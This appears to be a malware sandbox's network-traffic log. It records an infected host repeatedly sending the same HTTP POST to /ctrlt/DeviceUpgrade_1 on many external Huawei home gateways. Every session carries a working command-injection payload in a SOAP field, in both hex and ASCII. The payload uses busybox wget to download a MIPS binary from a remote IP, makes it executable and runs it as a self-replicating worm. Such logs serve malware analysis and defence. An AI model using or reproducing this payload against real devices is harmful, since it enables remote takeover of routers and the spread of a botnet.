                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2049192.168.2.134123885.112.71.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575371981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2050192.168.2.1351312168.0.167.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575381994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2051192.168.2.1342124197.15.140.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575403929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2052192.168.2.1347018197.104.43.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575419903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2053192.168.2.1353652157.63.61.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575427055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2054192.168.2.1334436157.15.109.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575438976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2055192.168.2.1357474157.113.117.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575454950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2056192.168.2.1349416197.64.205.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575476885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2057192.168.2.1335842157.188.48.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575476885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2058192.168.2.134857841.163.165.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575489044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 